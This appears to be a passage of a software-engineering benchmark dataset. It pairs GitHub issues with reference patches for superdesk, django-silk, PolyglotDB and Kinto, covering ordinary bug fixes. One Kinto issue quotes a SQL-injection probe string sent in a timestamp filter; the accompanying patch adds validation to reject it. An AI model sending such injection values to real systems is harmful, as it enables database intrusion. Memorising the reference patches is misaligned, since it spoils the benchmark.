+++ b/client/views/settings/website-management/partials/routes-tree.html
@@ -26,14 +26,16 @@
</div>
<div class="listElement__right">
<span
- sd-tooltip="This route is redirected"
+ sd-tooltip="This route is redirected to {{route.redirect_route.route_target.name}}"
flow="left"
- ng-if="route.redirect"
- ><i class="icon-random"></i
- ></span>
+ ng-if="route.redirect_route"
+ >
+ <i class="icon-random"></i>
+ </span>
<span sd-tooltip="Paywall secured" flow="left" ng-if="route.paywall_secured"
><i class="icon-paywall icon--orange icon--full-opacity"></i
></span>
+
<div class="dropdown dropdown--align-right" dropdown>
<button class="dropdown__toggle dropdown--toggle" dropdown__toggle>
<i class="icon-dots-vertical"></i>
diff --git a/client/views/settings/website-management/partials/tenant.html b/client/views/settings/website-management/partials/tenant.html
index 3383eedf..89cdb9b2 100644
--- a/client/views/settings/website-management/partials/tenant.html
+++ b/client/views/settings/website-management/partials/tenant.html
@@ -2,7 +2,7 @@
<h3 class="sd-grid-item-header__heading sd-overflow-ellipsis">
<a
target="_blank"
- ng-href="{{site.output_channel ? site.output_channel.config.url : site.subdomain ? 'http://' + site.subdomain + '.' + site.domain_name: 'http://' + site.domain_name}}"
+ ng-href="{{site.pwa_config && site.pwa_config.url ? site.pwa_config.url: site.output_channel ? site.output_channel.config.url : site.subdomain ? 'http://' + site.subdomain + '.' + site.domain_name: 'http://' + site.domain_name}}"
flow="down"
>
<span>{{ site.name }}</span><i class="icon-external"></i>
@@ -28,17 +28,27 @@ <h3 class="sd-grid-item-header__heading sd-overflow-ellipsis">
</div>
<div class="sd-card sd-card--flex-grow">
<div class="dashboard-content-header sd-shadow--z1">
- <div class="dashboard-thumbnail-block">
+ <div
+ class="dashboard-thumbnail-block"
+ ng-if="site.pwa_config && site.pwa_config.url"
+ >
+ <span class="sp-logo-pwa" style="width: 100px; height: 62px"></span>
+ </div>
+ <div
+ class="dashboard-thumbnail-block"
+ ng-if="!site.pwa_config || !site.pwa_config.url"
+ >
<div class="dashboard-thumbnail-block__image">
<img
ng-if="!site.theme.screenshots[0] || !site.theme.screenshots[0].url"
src="../../../../directives/themeManager/no-theme-preview.png"
- style="max-width:140px; max-height: 60px"
+ style="max-width: 140px; max-height: 60px"
/>
+
<img
ng-if="site.theme.screenshots[0] && site.theme.screenshots[0].url"
ng-src="{{site.theme.screenshots[0].url}}"
- style="max-width:140px; max-height: 60px"
+ style="max-width: 140px; max-height: 60px"
/>
</div>
<div class="dashboard-thumbnail-block__meta">
diff --git a/client/views/settings/website-management/route-form.html b/client/views/settings/website-management/route-form.html
index a02e43cf..691d5a87 100644
--- a/client/views/settings/website-management/route-form.html
+++ b/client/views/settings/website-management/route-form.html
@@ -22,10 +22,11 @@
<div class="side-panel__content">
<div class="side-panel__content-block">
- <div class="sd-alert sd-alert--hollow" ng-if="newRoute.redirect">
+ <div class="sd-alert sd-alert--hollow" ng-if="newRoute.redirect_route">
<Icon name="random" />
<p className="sd-margin-l--1">
- This Route has redirect set to another Route. Details on:
+ This Route has redirect set to
+ {{newRoute.redirect_route.route_target.name}}. Details on:
<a
className="text-link"
href=""
@@ -89,7 +90,7 @@
id="routeParent"
class="dropdown__toggle line-input"
ng-model="newRoute.parent"
- ng-options="route.id as route.name for route in routes.children | filter: {id: newRoute.id ? '!' + newRoute.id : ''}"
+ ng-options="route.id as route.name for route in routes_flat | filter: {id: newRoute.id ? '!' + newRoute.id : ''}"
>
<option value=""></option>
</select>
diff --git a/client/views/settings/website-management/tenant-list.html b/client/views/settings/website-management/tenant-list.html
index cb44ed4c..e49efd54 100644
--- a/client/views/settings/website-management/tenant-list.html
+++ b/client/views/settings/website-management/tenant-list.html
@@ -21,6 +21,11 @@ <h2 class="sd-page__page-heading sd-margin-r--5">Website Management</h2>
Superdesk Publisher
</button>
</li>
+ <li>
+ <button ng-click="webPublisherSettings.toggleSiteWizard('PWA')">
+ PWA
+ </button>
+ </li>
<li>
<button ng-click="webPublisherSettings.toggleSiteWizard('Wordpress')">
Wordpress
@@ -33,7 +38,7 @@ <h2 class="sd-page__page-heading sd-margin-r--5">Website Management</h2>
<div class="sd-loader" ng-if="loading"></div>
<a
class="btn btn--sd-green btn--icon-only-circle btn--large sd-shadow--z4 fixedPosition fixedPosition--bottomRight"
- style="z-index:1"
+ style="z-index: 1"
ng-click="webPublisherSettings.toggleInfoCarousel()"
><i class="icon-info-large"></i
></a>
diff --git a/package.json b/package.json
index e71ed21a..4948f1cf 100644
--- a/package.json
+++ b/package.json
@@ -42,8 +42,10 @@
"react-beautiful-dnd": "^13.0.0",
"react-infinite-scroll-component": "^5.0.4",
"react-select": "^3.0.4",
+ "react": "16.9.0",
+ "react-dom": "16.9.0",
"react-virtualized": "^9.22.2",
- "superdesk-ui-framework": "^2.3.4"
+ "superdesk-ui-framework": "^2.3.8"
},
"devDependencies": {
"@babel/plugin-proposal-class-properties": "^7.4.4",
@@ -61,7 +63,7 @@
"jest-dom": "^3.4.0",
"jest-transform-css": "^2.0.0",
"superdesk-code-style": "^1.0.0",
- "superdesk-core": "superdesk/superdesk-client-core#9242566",
+ "superdesk-core": "superdesk/superdesk-client-core",
"wait-for-expect": "^1.2.0"
}
}
| make sure that tenant is reset
| 2021-06-18T08:53:31 | 0.0 | [] | [] |
|||
jazzband/django-silk | jazzband__django-silk-732 | dfb2826f1c76f6afa0c970bcc1b885db7507971e | diff --git a/tox.ini b/tox.ini
index 377fd94f..9da52bf8 100644
--- a/tox.ini
+++ b/tox.ini
@@ -11,13 +11,14 @@ DJANGO =
3.2: dj32
4.2: dj42
5.0: dj50
+ 5.1: dj51
main: djmain
[tox]
envlist =
py{38,39,310}-dj32-{sqlite3,mysql,postgresql}
- py{38,39,310,311}-dj{41,42,50,main}-{sqlite3,mysql,postgresql}
- py312-dj{42,50,main}-{sqlite3,mysql,postgresql}
+ py{38,39,310,311,312}-dj42-{sqlite3,mysql,postgresql}
+ py{310,311,312}-dj{50,51,main}-{sqlite3,mysql,postgresql}
[testenv]
usedevelop = True
@@ -31,6 +32,7 @@ deps =
dj32: django>=3.2,<3.3
dj42: django>=4.2,<4.3
dj50: django>=5.0,<5.1
+ dj51: django>=5.1,<5.2
djmain: https://github.com/django/django/archive/main.tar.gz
py312: setuptools
setenv =
| Explicitly test against Django 5.1
Currently there are tests against Django 5.0 and `main` but failures against `main` are ignored: https://github.com/albertyw/django-silk/blob/master/tox.ini#L24-L25
There should explicitly be non-ignored tests against Django 5.1 for as long as it is supported.
| 2024-08-16T04:35:19 | 0.0 | [] | [] |
|||
jazzband/django-silk | jazzband__django-silk-709 | 1cb46236b85f2f0b83296a02b64e9fc5f9021247 | diff --git a/silk/code_generation/curl.py b/silk/code_generation/curl.py
index 1181a92d..db135911 100644
--- a/silk/code_generation/curl.py
+++ b/silk/code_generation/curl.py
@@ -3,7 +3,7 @@
from django.template import Context, Template
-curl_template = """
+curl_template = """\
curl {% if method %}-X {{ method }}{% endif %}
{% if content_type %}-H 'content-type: {{ content_type }}'{% endif %}
{% if modifier %}{{ modifier }} {% endif %}{% if body %}'{{ body }}'{% endif %}
@@ -66,4 +66,4 @@ def curl_cmd(url, method=None, query_params=None, body=None, content_type=None):
'content_type': content_type,
'extra': extra,
}
- return t.render(Context(context)).replace('\n', ' ')
+ return t.render(Context(context, autoescape=False)).replace('\n', ' ')
| Curl and Django Test Client URL parameters are being url encoded
Curl and Django Test Client URL parameters are being rendered in encoded form.
Example:
Curl:
```bash
curl -X GET http://localhost:5000/px/?c=227cd4d894c7deb&amp;rid=8bf881e6-93da-48c2-9c04-fbc55210708e&amp;ccuid=a2696ad5-6610-4e1e-8e9f-c95174ea3c56
# EXPECTED
curl -X GET http://localhost:5000/px/?c=227cd4d894c7deb&rid=8bf881e6-93da-48c2-9c04-fbc55210708e&ccuid=a2696ad5-6610-4e1e-8e9f-c95174ea3c560000
```
Django Test Client section:
```python
from django.test import Client
c = Client()
response = c.get(path='/px/',
              data={&#x27;c&#x27;: &#x27;227cd4d894c7deb&#x27;, &#x27;rid&#x27;: &#x27;8bf881e6-93da-48c2-9c04-fbc55210708e&#x27;, &#x27;ccuid&#x27;: &#x27;a2696ad5-6610-4e1e-8e9f-c95174ea3c56&#x27;})
# EXPECTED:
response = c.get(path='/px/',
data={"c": "227cd4d894c7deb", "ccuid": "a2696ad5-6610-4e1e-8e9f-c95174ea3c56", "rid": "8bf881e6-93da-48c2-9c04-fbc55210708e"})
```
Here are the query parameters:
```python
{
"c": "227cd4d894c7deb",
"ccuid": "a2696ad5-6610-4e1e-8e9f-c95174ea3c56",
"rid": "8bf881e6-93da-48c2-9c04-fbc55210708e"
}
```
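The mangled `&amp;`/`&#x27;` sequences come from Django template autoescaping. A minimal stdlib sketch of the same escaping, using `html.escape` purely to illustrate the substitutions (this is not Django's actual code path):

```python
from html import escape

# html.escape applies the same substitutions Django's autoescaping does:
# '&' becomes '&amp;' and a single quote becomes '&#x27;'.
url = "http://localhost:5000/px/?c=227cd4d894c7deb&rid=8bf881e6"
print(escape(url))    # the '&' is rendered as '&amp;'
print(escape("'c'"))  # quotes are rendered as '&#x27;'
```

The fix in the patch avoids this by rendering the generated commands with `Context(context, autoescape=False)`.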
| 2024-03-11T21:28:32 | 0.0 | [] | [] |
|||
jazzband/django-silk | jazzband__django-silk-692 | 23ff43b43fdc7abb78c2d738b0913bd3dfb3488d | diff --git a/silk/collector.py b/silk/collector.py
index 6c7f854b..912b9298 100644
--- a/silk/collector.py
+++ b/silk/collector.py
@@ -92,7 +92,13 @@ def configure(self, request=None, should_profile=True):
self._configure()
if should_profile:
self.local.pythonprofiler = cProfile.Profile()
- self.local.pythonprofiler.enable()
+ try:
+ self.local.pythonprofiler.enable()
+ except ValueError as e:
+ # Deal with cProfile not being allowed to run concurrently
+ # https://github.com/jazzband/django-silk/issues/682
+ Logger.error('Could not enable python profiler, %s' % str(e), exc_info=True)
+ self.local.pythonprofiler = None
def clear(self):
self.request = None
| [Python 3.12] ValueError: Another profiling tool is already active
In python 3.12 sometimes this exception raises, usually immediately after the server starts in the first request.
`SILKY_PYTHON_PROFILER = False` seems to fix it.
```
File "/backend/python/lib/python3.12/site-packages/django/core/handlers/exception.py", line 55, in inner
response = get_response(request)
File "/backend/python/lib/python3.12/site-packages/silk/middleware.py", line 70, in __call__
self.process_request(request)
File "/backend/python/lib/python3.12/site-packages/silk/middleware.py", line 121, in process_request
DataCollector().configure(request_model, should_profile=should_profile)
File "/backend/python/lib/python3.12/site-packages/silk/collector.py", line 95, in configure
self.local.pythonprofiler.enable()
ValueError: Another profiling tool is already active
```
https://github.com/python/cpython/issues/110770#issuecomment-1759986100
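A minimal sketch of the defensive pattern the fix adopts: swallow the `ValueError` that Python 3.12 raises when another profiling tool is already active, and fall back to no profiling (function name and structure here are illustrative, not the actual middleware code):

```python
import cProfile


def safe_enable_profiler():
    """Return an enabled profiler, or None when another profiling tool
    is already active (Python 3.12 raises ValueError in that case)."""
    profiler = cProfile.Profile()
    try:
        profiler.enable()
    except ValueError:
        # Another profiler (coverage tool, debugger, ...) owns the hook.
        return None
    return profiler


profiler = safe_enable_profiler()
# ... handle the request ...
if profiler is not None:
    profiler.disable()
```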
| 2023-12-30T22:30:22 | 0.0 | [] | [] |
|||
jazzband/django-silk | jazzband__django-silk-674 | 25b319197bda5f423cee2ecc9a01bd6f9624e36f | diff --git a/silk/model_factory.py b/silk/model_factory.py
index 59c57f51..a802beb4 100644
--- a/silk/model_factory.py
+++ b/silk/model_factory.py
@@ -66,19 +66,17 @@ def encoded_headers(self):
"""
From Django docs (https://docs.djangoproject.com/en/2.0/ref/request-response/#httprequest-objects):
"""
- headers = {}
- sensitive_headers = {'authorization'}
+ sensitive_headers = set(map(str.lower, SilkyConfig().SILKY_SENSITIVE_KEYS))
+ sensitive_headers.add('authorization')
+ if SilkyConfig().SILKY_HIDE_COOKIES:
+ sensitive_headers.add('cookie')
+ headers = {}
for k, v in self.request.headers.items():
+ k = k.lower()
if k in sensitive_headers:
v = RequestModelFactory.CLEANSED_SUBSTITUTE
-
headers[k] = v
- if SilkyConfig().SILKY_HIDE_COOKIES:
- try:
- del headers['COOKIE']
- except KeyError:
- pass
return json.dumps(headers, cls=DefaultEncoder, ensure_ascii=SilkyConfig().SILKY_JSON_ENSURE_ASCII)
| SILKY_HIDE_COOKIES does not hide cookie header in different case
The SILKY_HIDE_COOKIES setting does not hide the cookie header if it is written in a different case.
**Current behavior:**
When using the `SILKY_HIDE_COOKIES` setting, the cookie header is not hidden if its name differs in case from the upper-case `COOKIE` key hardcoded in the code.
**Expected behavior:**
The `SILKY_HIDE_COOKIES` setting should hide the cookie header, regardless of the case in which it is written. Currently, it only works if the case matches exactly.
**Steps to reproduce:**
1. Set the `SILKY_HIDE_COOKIES` setting to True.
2. Send a request with a 'cookie' header in lower case.
3. Inspect the request headers on the server side, and observe that the 'COOKIE' header is present.
**Refs**
- `COOKIE` in upper case is hardcoded [here](https://github.com/jazzband/django-silk/blob/master/silk/model_factory.py#L79)
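The fix is to compare header names case-insensitively before cleansing. A hedged sketch of that approach (function name and substitute string are illustrative, not silk's actual code):

```python
def cleanse_headers(headers, sensitive=("authorization", "cookie"),
                    substitute="********"):
    """Replace the values of sensitive headers, matching names
    case-insensitively so 'Cookie', 'COOKIE' and 'cookie' are all caught."""
    return {
        name: substitute if name.lower() in sensitive else value
        for name, value in headers.items()
    }


print(cleanse_headers({"Cookie": "sessionid=abc", "Accept": "text/html"}))
```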
| 2023-09-08T10:08:14 | 0.0 | [] | [] |
|||
MontrealCorpusTools/PolyglotDB | MontrealCorpusTools__PolyglotDB-148 | 36d97af291b7ddc60b5c8c8b974bc9a011ef96ad | diff --git a/polyglotdb/acoustics/io.py b/polyglotdb/acoustics/io.py
index 3f171a71..e329ad37 100755
--- a/polyglotdb/acoustics/io.py
+++ b/polyglotdb/acoustics/io.py
@@ -105,7 +105,7 @@ def point_measures_to_csv(corpus_context, data, header):
writer.writerow(row)
-def point_measures_from_csv(corpus_context, header_info):
+def point_measures_from_csv(corpus_context, header_info, annotation_type="phone"):
float_set_template = 'n.{name} = toFloat(csvLine.{name})'
int_set_template = 'n.{name} = toInt(csvLine.{name})'
bool_set_template = '''n.{name} = (CASE WHEN csvLine.{name} = 'False' THEN false ELSE true END)'''
@@ -134,18 +134,18 @@ def point_measures_from_csv(corpus_context, header_info):
import_statement = '''
USING PERIODIC COMMIT 2000
LOAD CSV WITH HEADERS FROM "{path}" AS csvLine
- MATCH (n:{phone_type}:{corpus_name}) where n.id = csvLine.id
+ MATCH (n:{annotation_type}:{corpus_name}) where n.id = csvLine.id
SET {new_properties}'''
statement = import_statement.format(path=import_path,
corpus_name=corpus_context.cypher_safe_name,
- phone_type=corpus_context.phone_name,
+ annotation_type=annotation_type,
new_properties=properties)
corpus_context.execute_cypher(statement)
for h in header_info.keys():
if h == 'id':
continue
- corpus_context.execute_cypher('CREATE INDEX ON :%s(%s)' % (corpus_context.phone_name, h))
- corpus_context.hierarchy.add_token_properties(corpus_context, corpus_context.phone_name,
+ corpus_context.execute_cypher('CREATE INDEX ON :%s(%s)' % (annotation_type, h))
+ corpus_context.hierarchy.add_token_properties(corpus_context, annotation_type,
[(h, t) for h, t in header_info.items() if h != 'id'])
corpus_context.encode_hierarchy()
diff --git a/polyglotdb/acoustics/other.py b/polyglotdb/acoustics/other.py
index c9fffed4..25f4da89 100644
--- a/polyglotdb/acoustics/other.py
+++ b/polyglotdb/acoustics/other.py
@@ -34,8 +34,10 @@ def generate_praat_script_function(praat_path, script_path, arguments=None):
def analyze_script(corpus_context,
- phone_class,
- script_path,
+ phone_class=None,
+ subset=None,
+ annotation_type=None,
+ script_path=None,
duration_threshold=0.01,
arguments=None,
call_back=None,
@@ -57,7 +59,11 @@ def analyze_script(corpus_context,
corpus_context : :class:`~polyglot.corpus.context.CorpusContext`
corpus context to use
phone_class : str
- the name of an already encoded phone class, on which the analysis will be run
+ DEPRECATED, the name of an already encoded subset of phones on which the analysis will be run
+ subset : str, optional
+ the name of an already encoded subset of an annotation type, on which the analysis will be run
+ annotation_type : str
+ the type of annotation that the analysis will go over
script_path : str
full path to the praat script
duration_threshold : float
@@ -75,10 +81,16 @@ def analyze_script(corpus_context,
"""
if file_type not in ['consonant', 'vowel', 'low_freq']:
raise ValueError('File type must be one of: consonant, vowel, or low_freq')
+
+ if phone_class is not None:
+ raise DeprecationWarning("The phone_class parameter has now been deprecated, please use annotation_type='phone' and subset='{}'".format(phone_class))
+ annotation_type = corpus_context.phone_name
+ subset = phone_class
+
if call_back is not None:
- call_back('Analyzing phones...')
+ call_back('Analyzing {}...'.format(annotation_type))
time_section = time.time()
- segment_mapping = generate_segments(corpus_context, corpus_context.phone_name, phone_class, file_type=file_type,
+ segment_mapping = generate_segments(corpus_context, annotation_type, subset, file_type=file_type,
padding=0, duration_threshold=duration_threshold)
if call_back is not None:
call_back("generate segments took: " + str(time.time() - time_section))
@@ -92,7 +104,7 @@ def analyze_script(corpus_context,
header = sorted(list(output.values())[0].keys())
header_info = {h: float for h in header}
point_measures_to_csv(corpus_context, output, header)
- point_measures_from_csv(corpus_context, header_info)
+ point_measures_from_csv(corpus_context, header_info, annotation_type=annotation_type)
return [x for x in header if x != 'id']
diff --git a/polyglotdb/corpus/audio.py b/polyglotdb/corpus/audio.py
index 9dd05cdd..516295b1 100755
--- a/polyglotdb/corpus/audio.py
+++ b/polyglotdb/corpus/audio.py
@@ -403,10 +403,10 @@ def analyze_intensity(self, source='praat', stop_check=None, call_back=None, mul
"""
analyze_intensity(self, source, stop_check, call_back, multiprocessing=multiprocessing)
- def analyze_script(self, phone_class, script_path, duration_threshold=0.01, arguments=None, stop_check=None,
+ def analyze_script(self, phone_class=None, subset=None, annotation_type=None, script_path=None, duration_threshold=0.01, arguments=None, stop_check=None,
call_back=None, multiprocessing=True, file_type='consonant'):
"""
- Use a Praat script to analyze phones in the corpus. The Praat script must return properties per phone (i.e.,
+ Use a Praat script to analyze annotation types in the corpus. The Praat script must return properties per phone (i.e.,
point measures, not a track), and these properties will be saved to the Neo4j database.
See :meth:`polyglotdb.acoustics.other..analyze_script` for more details.
@@ -414,7 +414,11 @@ def analyze_script(self, phone_class, script_path, duration_threshold=0.01, argu
Parameters
----------
phone_class : str
- Name of the phone subset to analyze
+ DEPRECATED, the name of an already encoded subset of phones on which the analysis will be run
+ subset : str, optional
+ the name of an already encoded subset of an annotation type, on which the analysis will be run
+ annotation_type : str
+ the type of annotation that the analysis will go over
script_path : str
Path to the Praat script
duration_threshold : float
@@ -435,7 +439,7 @@ def analyze_script(self, phone_class, script_path, duration_threshold=0.01, argu
list
List of the names of newly added properties to the Neo4j database
"""
- return analyze_script(self, phone_class, script_path, duration_threshold=duration_threshold,
+ return analyze_script(self, subset=subset, annotation_type=annotation_type, phone_class=phone_class, script_path=script_path, duration_threshold=duration_threshold,
arguments=arguments,
stop_check=stop_check, call_back=call_back, multiprocessing=multiprocessing)
diff --git a/polyglotdb/corpus/importable.py b/polyglotdb/corpus/importable.py
index 7abdb9f2..5e270c2e 100755
--- a/polyglotdb/corpus/importable.py
+++ b/polyglotdb/corpus/importable.py
@@ -165,6 +165,10 @@ def load_discourse(self, parser, path):
"""
data = parser.parse_discourse(path)
+
+ #If there is no data, e.g. empty TextGrid, return the empty list early.
+ if data is None:
+ return []
self.initialize_import(data.speakers, data.token_headers, data.hierarchy.subannotations)
self.add_types(*data.types(self.corpus_name))
self.add_discourse(data)
diff --git a/polyglotdb/io/enrichment/helper.py b/polyglotdb/io/enrichment/helper.py
index ca27edc3..fd5c1d8e 100755
--- a/polyglotdb/io/enrichment/helper.py
+++ b/polyglotdb/io/enrichment/helper.py
@@ -1,5 +1,6 @@
import csv
from collections import defaultdict
+from ...exceptions import ParseError
def sanitize_name(string):
@@ -16,6 +17,8 @@ def sanitize_name(string):
str
Sanitized string
"""
+ if "." in string:
+ raise ParseError("Column name, \"{}\" contains a period which is not permitted in CSVs used by PolyglotDB".format(string))
return string.strip().replace(' ', '_').lower()
diff --git a/polyglotdb/io/helper.py b/polyglotdb/io/helper.py
index 517a03a1..b884f396 100755
--- a/polyglotdb/io/helper.py
+++ b/polyglotdb/io/helper.py
@@ -308,16 +308,16 @@ def find_wav_path(path):
str or None
Full path of the wav file if it exists or None if it does not
"""
- wav_path = ""
name, ext = os.path.splitext(path)
+
wav_path = name + '.wav'
- if ".WAV" in ext:
- wav_path = name + '.WAV'
- elif ".wav" in ext:
- wav_path = name + '.wav'
- #print("path:",wav_path)
if os.path.exists(wav_path):
return wav_path
+
+ wav_path = name + '.WAV'
+ if os.path.exists(wav_path):
+ return wav_path
+
return None
diff --git a/polyglotdb/io/parsers/textgrid.py b/polyglotdb/io/parsers/textgrid.py
index 93276d9c..ce46dc39 100755
--- a/polyglotdb/io/parsers/textgrid.py
+++ b/polyglotdb/io/parsers/textgrid.py
@@ -4,6 +4,7 @@
from polyglotdb.exceptions import TextGridError
from polyglotdb.structure import Hierarchy
+from polyglotdb.io.types.parsing import Orthography, Transcription
from .base import BaseParser, DiscourseData
@@ -98,6 +99,22 @@ def parse_discourse(self, path, types_only=False):
self.annotation_tiers[i].add(((x.mark.strip(), x.minTime, x.maxTime) for x in ti))
else:
self.annotation_tiers[i].add(((x.mark.strip(), x.time) for x in ti))
+
+ is_empty_textgrid = True
+
+ for t in self.annotation_tiers:
+ for interval in t:
+ if isinstance(interval, Orthography):
+ if interval.label != "":
+ is_empty_textgrid = False
+ break
+ if isinstance(interval, Transcription):
+ if interval._list != []:
+ is_empty_textgrid = False
+ break
+ if is_empty_textgrid:
+ return None
+
pg_annotations = self._parse_annotations(types_only)
data = DiscourseData(name, pg_annotations, self.hierarchy)
| Allow for custom praat scripts to be run with non-phone annotation types
Currently praat scripts only work for phone intervals. Conceivably this can be generalized to all annotation types, e.g. for scripts that measure SNR for utterances.
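One way to generalize the signature while keeping the old `phone_class` argument working is a deprecation shim. This sketch uses `warnings.warn` for illustration and simplified names; the library's actual handling may differ:

```python
import warnings


def analyze_script(script_path, phone_class=None, subset=None,
                   annotation_type=None):
    """Illustrative shim: map the legacy phone_class argument onto the
    generalized annotation_type/subset pair."""
    if phone_class is not None:
        warnings.warn(
            "phone_class is deprecated; use annotation_type='phone' and "
            "subset=%r instead" % phone_class,
            DeprecationWarning,
        )
        annotation_type, subset = "phone", phone_class
    return annotation_type, subset


# Old call sites keep working; new ones can target any annotation type:
print(analyze_script("snr.praat", annotation_type="utterance"))
```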
Accept WAV files as well as wav
Right now files are not found if they end with `.WAV` instead of `.wav`. This is not ideal since a lot of older corpora use the former.
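A minimal sketch of an extension-tolerant lookup, trying `.wav` first and falling back to `.WAV` (mirrors the idea of the fix, not necessarily the library's exact code):

```python
import os


def find_wav_path(path):
    """Return the audio file matching `path` with a .wav or .WAV
    extension, or None if neither exists."""
    name, _ = os.path.splitext(path)
    for ext in (".wav", ".WAV"):
        candidate = name + ext
        if os.path.exists(candidate):
            return candidate
    return None
```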
| 2019-06-27T15:22:11 | 0.0 | [] | [] |
|||
Kinto/kinto | Kinto__kinto-3477 | 10cca5fa71dee834068f9405cf6f7df28c14f7d4 | diff --git a/kinto/core/resource/__init__.py b/kinto/core/resource/__init__.py
index f8aaa7b15..da447642e 100644
--- a/kinto/core/resource/__init__.py
+++ b/kinto/core/resource/__init__.py
@@ -665,7 +665,7 @@ def delete(self):
obj = self._get_object_or_404(self.object_id)
self._raise_412_if_modified(obj)
- # Retreive the last_modified information from a querystring if present.
+ # Retrieve the last_modified information from a querystring if present.
last_modified = self.request.validated["querystring"].get("last_modified")
# If less or equal than current object. Ignore it.
@@ -1060,7 +1060,8 @@ def _extract_filters(self):
"""Extracts filters from QueryString parameters."""
def is_valid_timestamp(value):
- return isinstance(value, int) or re.match(r'^"?\d+"?$', str(value))
+ # Is either integer, or integer as string, or integer between 2 quotes.
+ return isinstance(value, int) or re.match(r'^(\d+)$|^("\d+")$', str(value))
queryparams = self.request.validated["querystring"]
| Crash with `psycopg2.errors.InvalidTextRepresentation` (bigint) with last_modified = `1733242309482"`
```
(psycopg2.errors.InvalidTextRepresentation) invalid input syntax for type bigint: "1733242309482""
LINE 7: AND as_epoch(last_modified) > '1733242309482"'
^
[SQL:
SELECT id, as_epoch(last_modified) AS last_modified, data
FROM objects
WHERE parent_id = %(parent_id)s
AND resource_name = %(resource_name)s
AND as_epoch(last_modified) > %(filters_value_0)s
ORDER BY last_modified DESC
LIMIT %(pagination_limit)s;
]
[parameters: {'parent_id': '/buckets/main/collections/quicksuggest', 'resource_name': 'record', 'filters_value_0': '1733242309482"', 'pagination_limit': 10001}]
(Background on this error at: https://sqlalche.me/e/20/9h9h
)
```
| 2024-12-10T18:02:02 | 0.0 | [] | [] |
|||
Kinto/kinto | Kinto__kinto-3476 | 10cca5fa71dee834068f9405cf6f7df28c14f7d4 | diff --git a/kinto/core/initialization.py b/kinto/core/initialization.py
index 397dc7ce9..0b8fa7adc 100644
--- a/kinto/core/initialization.py
+++ b/kinto/core/initialization.py
@@ -1,6 +1,7 @@
import logging
import random
import re
+import urllib.parse
import warnings
from datetime import datetime
from secrets import token_hex
@@ -474,6 +475,7 @@ def on_new_response(event):
try:
endpoint = utils.strip_uri_prefix(request.path)
+ endpoint = urllib.parse.quote_plus(endpoint, safe="/?&=-_")
except UnicodeDecodeError as e:
# This `on_new_response` callback is also called when a HTTP 400
# is returned because of an invalid UTF-8 path. We still want metrics.
@@ -507,7 +509,7 @@ def on_new_response(event):
unique=[
("method", request.method.lower()),
("endpoint", endpoint),
- ("status", str(request.response.status_code)),
+ ("status", str(event.response.status_code)),
]
+ metrics_matchdict_labels,
)
@@ -527,7 +529,7 @@ def on_new_response(event):
# Observe response size.
metrics_service.observe(
"request_size",
- len(request.response.body or b""),
+ len(event.response.body or b""),
labels=[("endpoint", endpoint)] + metrics_matchdict_labels,
)
diff --git a/kinto/plugins/statsd.py b/kinto/plugins/statsd.py
index b6a8830fb..5ae894011 100644
--- a/kinto/plugins/statsd.py
+++ b/kinto/plugins/statsd.py
@@ -13,6 +13,14 @@
statsd_module = None
+def sanitize(value):
+ """
+ Telegraf does not support ':' in values.
+ See https://github.com/influxdata/telegraf/issues/4495
+ """
+ return value.replace(":", "") if isinstance(value, str) else value
+
+
@implementer(metrics.IMetricsService)
class StatsDService:
def __init__(self, host, port, prefix):
@@ -22,7 +30,7 @@ def timer(self, key):
return self._client.timer(key)
def observe(self, key, value, labels=[]):
- return self._client.gauge(key, value)
+ return self._client.gauge(key, sanitize(value))
def count(self, key, count=1, unique=None):
if unique is None:
@@ -30,7 +38,7 @@ def count(self, key, count=1, unique=None):
if isinstance(unique, list):
# [("method", "get")] -> "method.get"
# [("endpoint", "/"), ("method", "get")] -> "endpoint./.method.get"
- unique = ".".join(f"{label[0]}.{label[1]}" for label in unique)
+ unique = ".".join(f"{label[0]}.{sanitize(label[1])}" for label in unique)
else:
warnings.warn(
"`unique` parameter should be of type ``list[tuple[str, str]]``",
| Sanitize endpoints strings before sending metrics to StatsD or Prometheus
https://github.com/Kinto/kinto/blob/10cca5fa71dee834068f9405cf6f7df28c14f7d4/kinto/plugins/statsd.py#L33
See https://github.com/mozilla/remote-settings/issues/722
| 2024-12-10T17:26:40 | 0.0 | [] | [] |
|||
Kinto/kinto | Kinto__kinto-3425 | b68cae5a274595887be91e06317c01edb1c63835 | diff --git a/kinto/core/resource/__init__.py b/kinto/core/resource/__init__.py
index 994f43cf4..f8aaa7b15 100644
--- a/kinto/core/resource/__init__.py
+++ b/kinto/core/resource/__init__.py
@@ -1058,6 +1058,10 @@ def _extract_limit(self):
def _extract_filters(self):
"""Extracts filters from QueryString parameters."""
+
+ def is_valid_timestamp(value):
+ return isinstance(value, int) or re.match(r'^"?\d+"?$', str(value))
+
queryparams = self.request.validated["querystring"]
filters = []
@@ -1090,7 +1094,7 @@ def _extract_filters(self):
send_alert(self.request, message, url)
operator = COMPARISON.LT
- if value == "" or not isinstance(value, (int, str, type(None))):
+ if value is not None and not is_valid_timestamp(value):
raise_invalid(self.request, **error_details)
filters.append(Filter(self.model.modified_field, value, operator))
@@ -1127,7 +1131,7 @@ def _extract_filters(self):
error_details["description"] = "Invalid character 0x00"
raise_invalid(self.request, **error_details)
- if field == self.model.modified_field and value == "":
+ if field == self.model.modified_field and not is_valid_timestamp(value):
raise_invalid(self.request, **error_details)
filters.append(Filter(field, value, operator))
| Crash with invalid integer value for `gt_last_modified`
For example:
```
querystring = {
_sort: "last_modified",
gt_last_modified: "171103608603432920249' or '7127'='7127"
}
```
crashes with
```
DataError (psycopg2.errors.NumericValueOutOfRange) value "171103608603432920249' or '7127'='7127" is out of range for type bigint
LINE 7: AND as_epoch(last_modified) > '17110360860343292...
```
We should check here that an integer is passed:
https://github.com/Kinto/kinto/blob/cb9cbf76beee92f7d09a3c498ebaa70ed195f256/kinto/core/resource/__init__.py#L1130-L1131
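A sketch of the guard described above, using the `^"?\d+"?$` pattern the fix adds so SQL-injection-shaped strings never reach the bigint cast (the helper name is illustrative):

```python
import re


def is_valid_timestamp(value):
    # Integers, or digit strings optionally wrapped in double quotes,
    # are the only accepted forms for last_modified filters.
    return isinstance(value, int) or bool(re.match(r'^"?\d+"?$', str(value)))


print(is_valid_timestamp("171103608603432920249' or '7127'='7127"))  # False
```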
| 2024-06-19T16:37:09 | 0.0 | [] | [] |
|||
Kinto/kinto | Kinto__kinto-3382 | 039d3e30008dfe9afb0ef55429aee7e7921f6c96 | diff --git a/Makefile b/Makefile
index c57ebbdbc..5726bf295 100644
--- a/Makefile
+++ b/Makefile
@@ -116,6 +116,7 @@ functional: install-dev need-kinto-running
$(VENV)/bin/py.test tests/functional.py
browser-test: need-kinto-running
+ $(VENV)/bin/playwright install firefox
